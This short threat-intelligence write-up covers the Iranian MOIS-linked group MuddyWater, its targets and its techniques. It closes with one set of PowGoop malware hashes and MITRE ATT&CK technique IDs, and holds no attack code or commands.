USCYBERCOM has officially linked to Iran’s Ministry of Intelligence and Security (MOIS). The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.
The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that targeted entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.
MOIS is the primary intelligence agency of the Islamic Republic of Iran and a member of the Iran Intelligence Community. These actors, known as MuddyWater in industry, are part of groups conducting Iranian intelligence activities, and have been seen using a variety of techniques to maintain access to victim networks. MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).
MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
The researchers discovered an interesting subset of activity targeting Exchange servers of high-profile organizations. The subset of Exchange exploitation activity is interesting because it is difficult to attribute it to MuddyWater due to the use of publicly available offensive security tools. The attackers attempt to exploit Exchange servers using two different tools.
Indicators of Compromise
PowGoop variants (MD5, SHA1, SHA256)
F8E7FF6895A18CC3D05D024AC7D8BE3E 97248B6E445D38D48334A30A916E7D9DDA33A9B2 F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3
T1190 – Exploit Public-Facing ApplicationT1572 – Protocol TunnelingT1574.001 – Hijack Execution Flow: DLL Search Order HijackingT1059.001 – Command and Scripting Interpreter: PowerShellT1505.003 – Server Software Component: Web ShellT1220 – XSL Script Processing